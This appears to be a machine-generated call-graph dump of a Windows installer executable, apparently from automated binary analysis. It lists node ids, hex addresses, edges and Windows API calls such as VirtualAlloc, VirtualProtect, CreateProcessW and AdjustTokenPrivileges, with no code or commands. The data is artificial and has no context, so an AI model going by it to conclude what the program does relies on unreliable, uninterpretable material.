5358 4028d7 FindClose 5357->5358 5359 402c2f 5357->5359 5358->5359 5360 40494a 5361 404980 5360->5361 5362 40495a 5360->5362 5364 404507 8 API calls 5361->5364 5363 4044a0 22 API calls 5362->5363 5365 404967 SetDlgItemTextW 5363->5365 5366 40498c 5364->5366 5365->5361 5370 4016d1 5371 402dab 21 API calls 5370->5371 5372 4016d7 GetFullPathNameW 5371->5372 5373 4016f1 5372->5373 5379 401713 5372->5379 5376 40687e 2 API calls 5373->5376 5373->5379 5374 401728 GetShortPathNameW 5375 402c2f 5374->5375 5377 401703 5376->5377 5377->5379 5380 406521 lstrcpynW 5377->5380 5379->5374 5379->5375 5380->5379 5381 401e53 GetDC 5382 402d89 21 API calls 5381->5382 5383 401e65 GetDeviceCaps MulDiv ReleaseDC 5382->5383 5384 402d89 21 API calls 5383->5384 5385 401e96 5384->5385 5386 40655e 21 API calls 5385->5386 5387 401ed3 CreateFontIndirectW 5386->5387 5388 40263d 5387->5388 5389 402955 5390 402dab 21 API calls 5389->5390 5391 402961 5390->5391 5392 402977 5391->5392 5393 402dab 21 API calls 5391->5393 5394 405fec 2 API calls 5392->5394 5393->5392 5395 40297d 5394->5395 5417 406011 GetFileAttributesW CreateFileW 5395->5417 5397 40298a 5398 402a40 5397->5398 5399 4029a5 GlobalAlloc 5397->5399 5400 402a28 5397->5400 5401 402a47 DeleteFileW 5398->5401 5402 402a5a 5398->5402 5399->5400 5403 4029be 5399->5403 5404 4032b9 39 API calls 5400->5404 5401->5402 5418 4034b4 SetFilePointer 5403->5418 5406 402a35 CloseHandle 5404->5406 5406->5398 5407 4029c4 5408 40349e ReadFile 5407->5408 5409 4029cd GlobalAlloc 5408->5409 5410 402a11 5409->5410 5411 4029dd 5409->5411 5413 4060c3 WriteFile 5410->5413 5412 4032b9 39 API calls 5411->5412 5416 4029ea 5412->5416 5414 402a1d GlobalFree 5413->5414 5414->5400 5415 402a08 GlobalFree 5415->5410 5416->5415 5417->5397 5418->5407 5419 4045d6 lstrcpynW lstrlenW 4824 4014d7 4825 402d89 21 API calls 4824->4825 4826 4014dd Sleep 4825->4826 4828 402c2f 4826->4828 5420 70592d43 5421 70592d5b 5420->5421 5422 7059162f 2 API calls 5421->5422 5423 70592d76 5422->5423 5424 40195b 5425 402dab 21 API calls 5424->5425 5426 401962 lstrlenW 5425->5426 5427 40263d 5426->5427 5098 4020dd 5099 4020ef 5098->5099 5109 4021a1 5098->5109 5100 402dab 21 API calls 5099->5100 5101 4020f6 5100->5101 5103 402dab 21 API calls 5101->5103 5102 401423 28 API calls 5107 4022fb 5102->5107 5104 4020ff 5103->5104 5105 402115 LoadLibraryExW 5104->5105 5106 402107 GetModuleHandleW 5104->5106 5108 402126 5105->5108 5105->5109 5106->5105 5106->5108 5121 406984 5108->5121 5109->5102 5112 402170 5114 4055a6 28 API calls 5112->5114 5113 402137 5115 402156 5113->5115 5116 40213f 5113->5116 5117 402147 5114->5117 5126 70591817 5115->5126 5118 401423 28 API calls 5116->5118 5117->5107 5119 402193 FreeLibrary 5117->5119 5118->5117 5119->5107 5168 406543 WideCharToMultiByte 5121->5168 5123 4069a1 5124 4069a8 GetProcAddress 5123->5124 5125 402131 5123->5125 5124->5125 5125->5112 5125->5113 5127 7059184a 5126->5127 5169 70591bff 5127->5169 5129 70591851 5130 70591976 5129->5130 5131 70591869 5129->5131 5132 70591862 5129->5132 5130->5117 5203 70592480 5131->5203 5219 7059243e 5132->5219 5137 705918cd 5142 7059191e 5137->5142 5143 705918d3 5137->5143 5138 705918af 5232 70592655 5138->5232 5139 70591898 5152 7059188e 5139->5152 5229 70592e23 5139->5229 5140 7059187f 5141 70591885 5140->5141 5146 70591890 5140->5146 5141->5152 5213 70592b98 5141->5213 5150 70592655 10 API calls 5142->5150 5251 70591666 5143->5251 5145 705918b5 5243 70591654 5145->5243 5223 70592810 5146->5223 5155 7059190f 5150->5155 5152->5137 5152->5138 5160 70591965 5155->5160 5257 70592618 5155->5257 5157 70591896 5157->5152 5158 70592655 10 API calls 5158->5155 5160->5130 5163 7059196f GlobalFree 5160->5163 5163->5130 5165 70591951 5165->5160 5261 705915dd wsprintfW 5165->5261 5166 7059194a FreeLibrary 5166->5165 5168->5123 5264 705912bb GlobalAlloc 5169->5264 5171 70591c26 5265 705912bb GlobalAlloc 5171->5265 5173 70591e6b GlobalFree GlobalFree GlobalFree 5174 70591e88 5173->5174 5193 70591ed2 5173->5193 5176 7059227e 5174->5176 5182 70591e9d 5174->5182 5174->5193 5175 70591d26 GlobalAlloc 5196 70591c31 5175->5196 5177 705922a0 GetModuleHandleW 5176->5177 5176->5193 5180 705922b1 LoadLibraryW 5177->5180 5181 705922c6 5177->5181 5178 70591d71 lstrcpyW 5184 70591d7b lstrcpyW 5178->5184 5179 70591d8f GlobalFree 5179->5196 5180->5181 5180->5193 5272 705916bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5181->5272 5182->5193 5268 705912cc 5182->5268 5184->5196 5185 70592318 5187 70592325 lstrlenW 5185->5187 5185->5193 5186 70592126 5271 705912bb GlobalAlloc 5186->5271 5273 705916bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5187->5273 5191 70592067 GlobalFree 5191->5196 5192 705921ae 5192->5193 5200 70592216 lstrcpyW 5192->5200 5193->5129 5194 705922d8 5194->5185 5202 70592302 GetProcAddress 5194->5202 5195 7059233f 5195->5193 5196->5173 5196->5175 5196->5178 5196->5179 5196->5184 5196->5186 5196->5191 5196->5192 5196->5193 5197 705912cc 2 API calls 5196->5197 5198 70591dcd 5196->5198 5197->5196 5198->5196 5266 7059162f GlobalSize GlobalAlloc 5198->5266 5200->5193 5201 7059212f 5201->5129 5202->5185 5210 70592498 5203->5210 5204 705912cc GlobalAlloc lstrcpynW 5204->5210 5206 705925c1 GlobalFree 5207 7059186f 5206->5207 5206->5210 5207->5139 5207->5140 5207->5152 5208 7059256b GlobalAlloc CLSIDFromString 5208->5206 5209 70592540 GlobalAlloc WideCharToMultiByte 5209->5206 5210->5204 5210->5206 5210->5208 5210->5209 5212 7059258a 5210->5212 5275 7059135a 5210->5275 5212->5206 5279 705927a4 5212->5279 5214 70592baa 5213->5214 5215 70592c4f VirtualAlloc 5214->5215 5218 70592c6d 5215->5218 5217 70592d39 5217->5152 5282 70592b42 5218->5282 5220 70592453 5219->5220 5221 7059245e GlobalAlloc 5220->5221 5222 70591868 5220->5222 5221->5220 5222->5131 5227 70592840 5223->5227 5224 705928db GlobalAlloc 5228 705928fe 5224->5228 5225 705928ee 5226 705928f4 GlobalSize 5225->5226 5225->5228 5226->5228 5227->5224 5227->5225 5228->5157 5230 70592e2e 5229->5230 5231 70592e6e GlobalFree 5230->5231 5286 705912bb GlobalAlloc 5232->5286 5234 705926d8 MultiByteToWideChar 5238 7059265f 5234->5238 5235 7059270b lstrcpynW 5235->5238 5236 705926fa StringFromGUID2 5236->5238 5237 7059271e wsprintfW 5237->5238 5238->5234 5238->5235 5238->5236 5238->5237 5239 70592742 GlobalFree 5238->5239 5240 70592777 GlobalFree 5238->5240 5241 70591312 2 API calls 5238->5241 5287 70591381 5238->5287 5239->5238 5240->5145 5241->5238 5291 705912bb GlobalAlloc 5243->5291 5245 70591659 5246 70591666 2 API calls 5245->5246 5247 70591663 5246->5247 5248 70591312 5247->5248 5249 7059131b GlobalAlloc lstrcpynW 5248->5249 5250 70591355 GlobalFree 5248->5250 5249->5250 5250->5155 5252 7059169f lstrcpyW 5251->5252 5253 70591672 wsprintfW 5251->5253 5256 705916b8 5252->5256 5253->5256 5256->5158 5258 70591931 5257->5258 5259 70592626 5257->5259 5258->5165 5258->5166 5259->5258 5260 70592642 GlobalFree 5259->5260 5260->5259 5262 70591312 2 API calls 5261->5262 5263 705915fe 5262->5263 5263->5160 5264->5171 5265->5196 5267 7059164d 5266->5267 5267->5198 5274 705912bb GlobalAlloc 5268->5274 5270 705912db lstrcpynW 5270->5193 5271->5201 5272->5194 5273->5195 5274->5270 5276 70591361 5275->5276 5277 705912cc 2 API calls 5276->5277 5278 7059137f 5277->5278 5278->5210 5280 70592808 5279->5280 5281 705927b2 VirtualAlloc 5279->5281 5280->5212 5281->5280 5283 70592b4d 5282->5283 5284 70592b5d 5283->5284 5285 70592b52 GetLastError 5283->5285 5284->5217 5285->5284 5286->5238 5288 7059138a 5287->5288 5289 705913ac 5287->5289 5288->5289 5290 70591390 lstrcpyW 5288->5290 5289->5238 5290->5289 5291->5245 5428 402b5e 5429 402bb0 5428->5429 5430 402b65 5428->5430 5432 406915 5 API calls 5429->5432 5431 402bae 5430->5431 5433 402d89 21 API calls 5430->5433 5434 402bb7 5432->5434 5435 402b73 5433->5435 5436 402dab 21 API calls 5434->5436 5437 402d89 21 API calls 5435->5437 5438 402bc0 5436->5438 5441 402b7f 5437->5441 5438->5431 5439 402bc4 IIDFromString 5438->5439 5439->5431 5440 402bd3 5439->5440 5440->5431 5446 406521 lstrcpynW 5440->5446 5445 406468 wsprintfW 5441->5445 5443 402bf0 CoTaskMemFree 5443->5431 5445->5431 5446->5443 5454 40465f 5455 404677 5454->5455 5460 404791 5454->5460 5461 4044a0 22 API calls 5455->5461 5456 4047fb 5457 4048c5 5456->5457 5458 404805 GetDlgItem 5456->5458 5462 404507 8 API calls 5457->5462 5459 40481f 5458->5459 5463 404886 5458->5463 5459->5463 5467 404845 SendMessageW LoadCursorW SetCursor 5459->5467 5460->5456 5460->5457 5464 4047cc GetDlgItem SendMessageW 5460->5464 5465 4046de 5461->5465 5466 4048c0 5462->5466 5463->5457 5468 404898 5463->5468 5487 4044c2 KiUserCallbackDispatcher 5464->5487 5470 4044a0 22 API calls 5465->5470 5491 40490e 5467->5491 5473 4048ae 5468->5473 5474 40489e SendMessageW 5468->5474 5471 4046eb CheckDlgButton 5470->5471 5485 4044c2 KiUserCallbackDispatcher 5471->5485 5473->5466 5478 4048b4 SendMessageW 5473->5478 5474->5473 5475 4047f6 5488 4048ea 5475->5488 5478->5466 5480 404709 GetDlgItem 5486 4044d5 SendMessageW 5480->5486 5482 40471f SendMessageW 5483 404745 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5482->5483 5484 40473c GetSysColor 5482->5484 5483->5466 5484->5483 5485->5480 5486->5482 5487->5475 5489 4048f8 5488->5489 5490 4048fd SendMessageW 5488->5490 5489->5490 5490->5456 5494 405b47 ShellExecuteExW 5491->5494 5493 404874 LoadCursorW SetCursor 5493->5463 5494->5493 5495 402a60 5496 402d89 21 API calls 5495->5496 5497 402a66 5496->5497 5498 402aa9 5497->5498 5499 402a8d 5497->5499 5508 402933 5497->5508 5502 402ac3 5498->5502 5503 402ab3 5498->5503 5500 402a92 5499->5500 5501 402aa3 5499->5501 5509 406521 lstrcpynW 5500->5509 5510 406468 wsprintfW 5501->5510 5505 40655e 21 API calls 5502->5505 5504 402d89 21 API calls 5503->5504 5504->5508 5505->5508 5509->5508 5510->5508 5511 70591979 5512 7059199c 5511->5512 5513 705919d1 GlobalFree 5512->5513 5514 705919e3 5512->5514 5513->5514 5515 70591312 2 API calls 5514->5515 5516 70591b6e GlobalFree GlobalFree 5515->5516 4300 401761 4306 402dab 4300->4306 4304 40176f 4305 406040 2 API calls 4304->4305 4305->4304 4307 402db7 4306->4307 4308 40655e 21 API calls 4307->4308 4309 402dd8 4308->4309 4310 401768 4309->4310 4311 4067cf 5 API calls 4309->4311 4312 406040 4310->4312 4311->4310 4313 40604d GetTickCount GetTempFileNameW 4312->4313 4314 406087 4313->4314 4315 406083 4313->4315 4314->4304 4315->4313 4315->4314 5517 401d62 5518 402d89 21 API calls 5517->5518 5519 401d73 SetWindowLongW 5518->5519 5520 402c2f 5519->5520 4425 401ee3 4433 402d89 4425->4433 4427 401ee9 4428 402d89 21 API calls 4427->4428 4429 401ef5 4428->4429 4430 401f01 ShowWindow 4429->4430 4431 401f0c EnableWindow 4429->4431 4432 402c2f 4430->4432 4431->4432 4434 40655e 21 API calls 4433->4434 4435 402d9e 4434->4435 4435->4427 5521 4028e3 5522 4028eb 5521->5522 5523 4028ef FindNextFileW 5522->5523 5524 402901 5522->5524 5523->5524 5525 402948 5523->5525 5527 406521 lstrcpynW 5525->5527 5527->5524 4482 4056e5 4483 405706 GetDlgItem GetDlgItem GetDlgItem 4482->4483 4484 40588f 4482->4484 4528 4044d5 SendMessageW 4483->4528 4486 4058c0 4484->4486 4487 405898 GetDlgItem CreateThread CloseHandle 4484->4487 4489 4058eb 4486->4489 4490 405910 4486->4490 4491 4058d7 ShowWindow ShowWindow 4486->4491 4487->4486 4531 405679 OleInitialize 4487->4531 4488 405776 4495 40577d GetClientRect GetSystemMetrics SendMessageW SendMessageW 4488->4495 4492 4058f7 4489->4492 4493 40594b 4489->4493 4494 404507 8 API calls 4490->4494 4530 4044d5 SendMessageW 4491->4530 4497 405925 ShowWindow 4492->4497 4498 4058ff 4492->4498 4493->4490 4503 405959 SendMessageW 4493->4503 4510 40591e 4494->4510 4501 4057eb 4495->4501 4502 4057cf SendMessageW SendMessageW 4495->4502 4499 405945 4497->4499 4500 405937 4497->4500 4504 404479 SendMessageW 4498->4504 4506 404479 SendMessageW 4499->4506 4505 4055a6 28 API calls 4500->4505 4507 4057f0 SendMessageW 4501->4507 4508 4057fe 4501->4508 4502->4501 4509 405972 CreatePopupMenu 4503->4509 4503->4510 4504->4490 4505->4499 4506->4493 4507->4508 4512 4044a0 22 API calls 4508->4512 4511 40655e 21 API calls 4509->4511 4513 405982 AppendMenuW 4511->4513 4514 40580e 4512->4514 4515 4059b2 TrackPopupMenu 4513->4515 4516 40599f GetWindowRect 4513->4516 4517 405817 ShowWindow 4514->4517 4518 40584b GetDlgItem SendMessageW 4514->4518 4515->4510 4520 4059cd 4515->4520 4516->4515 4521 40583a 4517->4521 4522 40582d ShowWindow 4517->4522 4518->4510 4519 405872 SendMessageW SendMessageW 4518->4519 4519->4510 4523 4059e9 SendMessageW 4520->4523 4529 4044d5 SendMessageW 4521->4529 4522->4521 4523->4523 4524 405a06 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4523->4524 4526 405a2b SendMessageW 4524->4526 4526->4526 4527 405a54 GlobalUnlock SetClipboardData CloseClipboard 4526->4527 4527->4510 4528->4488 4529->4518 4530->4489 4532 4044ec SendMessageW 4531->4532 4533 40569c 4532->4533 4536 401389 2 API calls 4533->4536 4537 4056c3 4533->4537 4534 4044ec SendMessageW 4535 4056d5 OleUninitialize 4534->4535 4536->4533 4537->4534 4666 70592a7f 4667 70592acf 4666->4667 4668 70592a8f VirtualProtect 4666->4668 4668->4667 5528 404ce7 5529 404d13 5528->5529 5530 404cf7 5528->5530 5532 404d46 5529->5532 5533 404d19 SHGetPathFromIDListW 5529->5533 5539 405b65 GetDlgItemTextW 5530->5539 5535 404d30 SendMessageW 5533->5535 5536 404d29 5533->5536 5534 404d04 SendMessageW 5534->5529 5535->5532 5538 40140b 2 API calls 5536->5538 5538->5535 5539->5534 5540 401568 5541 402ba9 5540->5541 5544 406468 wsprintfW 5541->5544 5543 402bae 5544->5543 5545 70591774 5546 705917a3 5545->5546 5547 70591bff 22 API calls 5546->5547 5548 705917aa 5547->5548 5549 705917bd 5548->5549 5550 705917b1 5548->5550 5552 705917e4 5549->5552 5553 705917c7 5549->5553 5551 70591312 2 API calls 5550->5551 5554 705917bb 5551->5554 5556 705917ea 5552->5556 5557 7059180e 5552->5557 5555 705915dd 3 API calls 5553->5555 5559 705917cc 5555->5559 5560 70591654 3 API calls 5556->5560 5558 705915dd 3 API calls 5557->5558 5558->5554 5561 70591654 3 API calls 5559->5561 5562 705917ef 5560->5562 5564 705917d2 5561->5564 5563 70591312 2 API calls 5562->5563 5565 705917f5 GlobalFree 5563->5565 5566 70591312 2 API calls 5564->5566 5565->5554 5567 70591809 GlobalFree 5565->5567 5568 705917d8 GlobalFree 5566->5568 5567->5554 5568->5554 5569 40196d 5570 402d89 21 API calls 5569->5570 5571 401974 5570->5571 5572 402d89 21 API calls 5571->5572 5573 401981 5572->5573 5574 402dab 21 API calls 5573->5574 5575 401998 lstrlenW 5574->5575 5576 4019a9 5575->5576 5577 4019ea 5576->5577 5581 406521 lstrcpynW 5576->5581 5579 4019da 5579->5577 5580 4019df lstrlenW 5579->5580 5580->5577 5581->5579 5582 40166f 5583 402dab 21 API calls 5582->5583 5584 401675 5583->5584 5585 40687e 2 API calls 5584->5585 5586 40167b 5585->5586 5587 402af0 5588 402d89 21 API calls 5587->5588 5589 402af6 5588->5589 5590 402933 5589->5590 5591 40655e 21 API calls 5589->5591 5591->5590 5592 705923e9 5593 70592453 5592->5593 5594 7059245e GlobalAlloc 5593->5594 5595 7059247d 5593->5595 5594->5593 4717 4026f1 4718 402d89 21 API calls 4717->4718 4727 402700 4718->4727 4719 40283d 4720 40274a ReadFile 4720->4719 4720->4727 4721 4027e3 4721->4719 4721->4727 4731 4060f2 SetFilePointer 4721->4731 4722 406094 ReadFile 4722->4727 4723 40278a MultiByteToWideChar 4723->4727 4724 40283f 4740 406468 wsprintfW 4724->4740 4727->4719 4727->4720 4727->4721 4727->4722 4727->4723 4727->4724 4728 4027b0 SetFilePointer MultiByteToWideChar 4727->4728 4729 402850 4727->4729 4728->4727 4729->4719 4730 402871 SetFilePointer 4729->4730 4730->4719 4732 40610e 4731->4732 4735 406126 4731->4735 4733 406094 ReadFile 4732->4733 4734 40611a 4733->4734 4734->4735 4736 406157 SetFilePointer 4734->4736 4737 40612f SetFilePointer 4734->4737 4735->4721 4736->4735 4737->4736 4738 40613a 4737->4738 4739 4060c3 WriteFile 4738->4739 4739->4735 4740->4719 4741 401774 4742 402dab 21 API calls 4741->4742 4743 40177b 4742->4743 4744 4017a3 4743->4744 4745 40179b 4743->4745 4803 406521 lstrcpynW 4744->4803 4802 406521 lstrcpynW 4745->4802 4748 4017a1 4752 4067cf 5 API calls 4748->4752 4749 4017ae 4750 405df0 3 API calls 4749->4750 4751 4017b4 lstrcatW 4750->4751 4751->4748 4755 4017c0 4752->4755 4753 40687e 2 API calls 4753->4755 4754 4017fc 4756 405fec 2 API calls 4754->4756 4755->4753 4755->4754 4758 4017d2 CompareFileTime 4755->4758 4759 401892 4755->4759 4760 401869 4755->4760 4764 406521 lstrcpynW 4755->4764 4768 40655e 21 API calls 4755->4768 4775 405b81 MessageBoxIndirectW 4755->4775 4780 406011 GetFileAttributesW CreateFileW 4755->4780 4756->4755 4758->4755 4761 4055a6 28 API calls 4759->4761 4763 4055a6 28 API calls 4760->4763 4778 40187e 4760->4778 4762 40189c 4761->4762 4781 4032b9 4762->4781 4763->4778 4764->4755 4767 4018c3 SetFileTime 4769 4018d5 CloseHandle 4767->4769 4768->4755 4770 4018e6 4769->4770 4769->4778 4771 4018eb 4770->4771 4772 4018fe 4770->4772 4773 40655e 21 API calls 4771->4773 4774 40655e 21 API calls 4772->4774 4776 4018f3 lstrcatW 4773->4776 4777 401906 4774->4777 4775->4755 4776->4777 4777->4778 4779 405b81 MessageBoxIndirectW 4777->4779 4779->4778 4780->4755 4783 4032d2 4781->4783 4782 4032fd 4804 40349e 4782->4804 4783->4782 4814 4034b4 SetFilePointer 4783->4814 4787 4018af 4787->4767 4787->4769 4788 40331a GetTickCount 4791 40332d 4788->4791 4789 40343e 4790 403442 4789->4790 4795 40345a 4789->4795 4792 40349e ReadFile 4790->4792 4791->4787 4794 40349e ReadFile 4791->4794 4798 403393 GetTickCount 4791->4798 4799 4033bc MulDiv wsprintfW 4791->4799 4801 4060c3 WriteFile 4791->4801 4807 406a90 4791->4807 4792->4787 4793 40349e ReadFile 4793->4795 4794->4791 4795->4787 4795->4793 4796 4060c3 WriteFile 4795->4796 4796->4795 4798->4791 4800 4055a6 28 API calls 4799->4800 4800->4791 4801->4791 4802->4748 4803->4749 4805 406094 ReadFile 4804->4805 4806 403308 4805->4806 4806->4787 4806->4788 4806->4789 4808 406ab5 4807->4808 4809 406abd 4807->4809 4808->4791 4809->4808 4810 406b44 GlobalFree 4809->4810 4811 406b4d GlobalAlloc 4809->4811 4812 406bc4 GlobalAlloc 4809->4812 4813 406bbb GlobalFree 4809->4813 4810->4811 4811->4808 4811->4809 4812->4808 4812->4809 4813->4812 4814->4782 5610 4014f5 SetForegroundWindow 5611 402c2f 5610->5611 5612 401a77 5613 402d89 21 API calls 5612->5613 5614 401a80 5613->5614 5615 402d89 21 API calls 5614->5615 5616 401a25 5615->5616 5617 401578 5618 401591 5617->5618 5619 401588 ShowWindow 5617->5619 5620 40159f ShowWindow 5618->5620 5621 402c2f 5618->5621 5619->5618 5620->5621 5622 705910e1 5632 70591111 5622->5632 5623 705912b0 GlobalFree 5624 70591240 GlobalFree 5624->5632 5625 705911d7 GlobalAlloc 5625->5632 5626 7059135a 2 API calls 5626->5632 5627 705912ab 5627->5623 5628 70591312 2 API calls 5628->5632 5629 7059129a GlobalFree 5629->5632 5630 70591381 lstrcpyW 5630->5632 5631 7059116b GlobalAlloc 5631->5632 5632->5623 5632->5624 5632->5625 5632->5626 5632->5627 5632->5628 5632->5629 5632->5630 5632->5631 5633 4023f9 5634 402dab 21 API calls 5633->5634 5635 402408 5634->5635 5636 402dab 21 API calls 5635->5636 5637 402411 5636->5637 5638 402dab 21 API calls 5637->5638 5639 40241b GetPrivateProfileStringW 5638->5639 5640 401ffb 5641 402dab 21 API calls 5640->5641 5642 402002 5641->5642 5643 40687e 2 API calls 5642->5643 5644 402008 5643->5644 5646 402019 5644->5646 5647 406468 wsprintfW 5644->5647 5647->5646 4864 4034fc SetErrorMode GetVersionExW 4865 403550 GetVersionExW 4864->4865 4866 403588 4864->4866 4865->4866 4867 4035df 4866->4867 4868 406915 5 API calls 4866->4868 4869 4068a5 3 API calls 4867->4869 4868->4867 4870 4035f5 lstrlenA 4869->4870 4870->4867 4871 403605 4870->4871 4872 406915 5 API calls 4871->4872 4873 40360c 4872->4873 4874 406915 5 API calls 4873->4874 4875 403613 4874->4875 4876 406915 5 API calls 4875->4876 4877 40361f #17 OleInitialize SHGetFileInfoW 4876->4877 4952 406521 lstrcpynW 4877->4952 4880 40366e GetCommandLineW 4953 406521 lstrcpynW 4880->4953 4882 403680 4883 405e1d CharNextW 4882->4883 4884 4036a6 CharNextW 4883->4884 4890 4036b8 4884->4890 4885 4037ba 4886 4037ce GetTempPathW 4885->4886 4954 4034cb 4886->4954 4888 4037e6 4891 403840 DeleteFileW 4888->4891 4892 4037ea GetWindowsDirectoryW lstrcatW 4888->4892 4889 405e1d CharNextW 4889->4890 4890->4885 4890->4889 4898 4037bc 4890->4898 4964 403082 GetTickCount GetModuleFileNameW 4891->4964 4894 4034cb 12 API calls 4892->4894 4896 403806 4894->4896 4895 403854 4904 405e1d CharNextW 4895->4904 4935 4038fb 4895->4935 4943 40390b 4895->4943 4896->4891 4897 40380a GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4896->4897 4899 4034cb 12 API calls 4897->4899 5048 406521 lstrcpynW 4898->5048 4902 403838 4899->4902 4902->4891 4902->4943 4909 403873 4904->4909 4906 403a59 4908 405b81 MessageBoxIndirectW 4906->4908 4907 403a7d 4910 403a85 GetCurrentProcess OpenProcessToken 4907->4910 4913 403b01 ExitProcess 4907->4913 4915 403a67 ExitProcess 4908->4915 4911 4038d1 4909->4911 4912 403914 4909->4912 4916 403ad1 4910->4916 4917 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 4910->4917 4918 405ef8 18 API calls 4911->4918 4919 405aec 5 API calls 4912->4919 4920 406915 5 API calls 4916->4920 4917->4916 4921 4038dd 4918->4921 4922 403919 lstrlenW 4919->4922 4923 403ad8 4920->4923 4921->4943 5049 406521 lstrcpynW 4921->5049 5051 406521 lstrcpynW 4922->5051 4924 403aed ExitWindowsEx 4923->4924 4926 403afa 4923->4926 4924->4913 4924->4926 4930 40140b 2 API calls 4926->4930 4928 403933 4929 40394b 4928->4929 5052 406521 lstrcpynW 4928->5052 4934 403971 wsprintfW 4929->4934 4949 40399d 4929->4949 4930->4913 4931 4038f0 5050 406521 lstrcpynW 4931->5050 4936 40655e 21 API calls 4934->4936 4992 403bf3 4935->4992 4936->4929 4937 405a75 2 API calls 4937->4949 4938 405acf 2 API calls 4938->4949 4939 4039e7 SetCurrentDirectoryW 4941 4062e1 40 API calls 4939->4941 4940 4039ad GetFileAttributesW 4942 4039b9 DeleteFileW 4940->4942 4940->4949 4944 4039f6 CopyFileW 4941->4944 4942->4949 5056 403b19 4943->5056 4944->4943 4944->4949 4945 405c2d 71 API calls 4945->4949 4946 4062e1 40 API calls 4946->4949 4947 40655e 21 API calls 4947->4949 4949->4929 4949->4934 4949->4937 4949->4938 4949->4939 4949->4940 4949->4943 4949->4945 4949->4946 4949->4947 4950 403a6f CloseHandle 4949->4950 4951 40687e 2 API calls 4949->4951 5053 405b04 CreateProcessW 4949->5053 4950->4943 4951->4949 4952->4880 4953->4882 4955 4067cf 5 API calls 4954->4955 4957 4034d7 4955->4957 4956 4034e1 4956->4888 4957->4956 4958 405df0 3 API calls 4957->4958 4959 4034e9 4958->4959 4960 405acf 2 API calls 4959->4960 4961 4034ef 4960->4961 4962 406040 2 API calls 4961->4962 4963 4034fa 4962->4963 4963->4888 5063 406011 GetFileAttributesW CreateFileW 4964->5063 4966 4030c2 4967 4030d2 4966->4967 5064 406521 lstrcpynW 4966->5064 4967->4895 4969 4030e8 4970 405e3c 2 API calls 4969->4970 4971 4030ee 4970->4971 5065 406521 lstrcpynW 4971->5065 4973 4030f9 GetFileSize 4974 403110 4973->4974 4989 4031f3 4973->4989 4974->4967 4977 40349e ReadFile 4974->4977 4980 40325f 4974->4980 4988 40301e 6 API calls 4974->4988 4974->4989 4976 4031fc 4976->4967 4978 40322c GlobalAlloc 4976->4978 5078 4034b4 SetFilePointer 4976->5078 4977->4974 5077 4034b4 SetFilePointer 4978->5077 4982 40301e 6 API calls 4980->4982 4982->4967 4983 403215 4985 40349e ReadFile 4983->4985 4984 403247 4986 4032b9 39 API calls 4984->4986 4987 403220 4985->4987 4990 403253 4986->4990 4987->4967 4987->4978 4988->4974 5066 40301e 4989->5066 4990->4967 4990->4990 4991 403290 SetFilePointer 4990->4991 4991->4967 4993 406915 5 API calls 4992->4993 4994 403c07 4993->4994 4995 403c0d 4994->4995 4996 403c1f 4994->4996 5091 406468 wsprintfW 4995->5091 4997 4063ef 3 API calls 4996->4997 4998 403c4f 4997->4998 4999 403c6e lstrcatW 4998->4999 5002 4063ef 3 API calls 4998->5002 5001 403c1d 4999->5001 5083 403ec9 5001->5083 5002->4999 5005 405ef8 18 API calls 5006 403ca0 5005->5006 5007 403d34 5006->5007 5010 4063ef 3 API calls 5006->5010 5008 405ef8 18 API calls 5007->5008 5009 403d3a 5008->5009 5011 403d4a LoadImageW 5009->5011 5013 40655e 21 API calls 5009->5013 5012 403cd2 5010->5012 5014 403df0 5011->5014 5015 403d71 RegisterClassW 5011->5015 5012->5007 5016 403cf3 lstrlenW 5012->5016 5019 405e1d CharNextW 5012->5019 5013->5011 5018 40140b 2 API calls 5014->5018 5017 403da7 SystemParametersInfoW CreateWindowExW 5015->5017 5047 403dfa 5015->5047 5020 403d01 lstrcmpiW 5016->5020 5021 403d27 5016->5021 5017->5014 5024 403df6 5018->5024 5022 403cf0 5019->5022 5020->5021 5023 403d11 GetFileAttributesW 5020->5023 5025 405df0 3 API calls 5021->5025 5022->5016 5026 403d1d 5023->5026 5027 403ec9 22 API calls 5024->5027 5024->5047 5028 403d2d 5025->5028 5026->5021 5029 405e3c 2 API calls 5026->5029 5030 403e07 5027->5030 5092 406521 lstrcpynW 5028->5092 5029->5021 5032 403e13 ShowWindow 5030->5032 5033 403e96 5030->5033 5035 4068a5 3 API calls 5032->5035 5034 405679 5 API calls 5033->5034 5036 403e9c 5034->5036 5037 403e2b 5035->5037 5039 403ea0 5036->5039 5040 403eb8 5036->5040 5038 403e39 GetClassInfoW 5037->5038 5041 4068a5 3 API calls 5037->5041 5043 403e63 DialogBoxParamW 5038->5043 5044 403e4d GetClassInfoW RegisterClassW 5038->5044 5046 40140b 2 API calls 5039->5046 5039->5047 5042 40140b 2 API calls 5040->5042 5041->5038 5042->5047 5045 40140b 2 API calls 5043->5045 5044->5043 5045->5047 5046->5047 5047->4943 5048->4886 5049->4931 5050->4935 5051->4928 5052->4929 5054 405b43 5053->5054 5055 405b37 CloseHandle 5053->5055 5054->4949 5055->5054 5057 403b31 5056->5057 5058 403b23 CloseHandle 5056->5058 5094 403b5e 5057->5094 5058->5057 5061 405c2d 71 API calls 5062 403a4c OleUninitialize 5061->5062 5062->4906 5062->4907 5063->4966 5064->4969 5065->4973 5067 403027 5066->5067 5068 40303f 5066->5068 5069 403030 DestroyWindow 5067->5069 5070 403037 5067->5070 5071 403047 5068->5071 5072 40304f GetTickCount 5068->5072 5069->5070 5070->4976 5079 406951 5071->5079 5074 403080 5072->5074 5075 40305d CreateDialogParamW ShowWindow 5072->5075 5074->4976 5075->5074 5077->4984 5078->4983 5080 40696e PeekMessageW 5079->5080 5081 406964 DispatchMessageW 5080->5081 5082 40304d 5080->5082 5081->5080 5082->4976 5084 403edd 5083->5084 5093 406468 wsprintfW 5084->5093 5086 403f4e 5087 403f82 22 API calls 5086->5087 5089 403f53 5087->5089 5088 403c7e 5088->5005 5089->5088 5090 40655e 21 API calls 5089->5090 5090->5089 5091->5001 5092->5007 5093->5086 5095 403b6c 5094->5095 5096 403b71 FreeLibrary GlobalFree 5095->5096 5097 403b36 5095->5097 5096->5096 5096->5097 5097->5061 5648 401b7c 5649 402dab 21 API calls 5648->5649 5650 401b83 5649->5650 5651 402d89 21 API calls 5650->5651 5652 401b8c wsprintfW 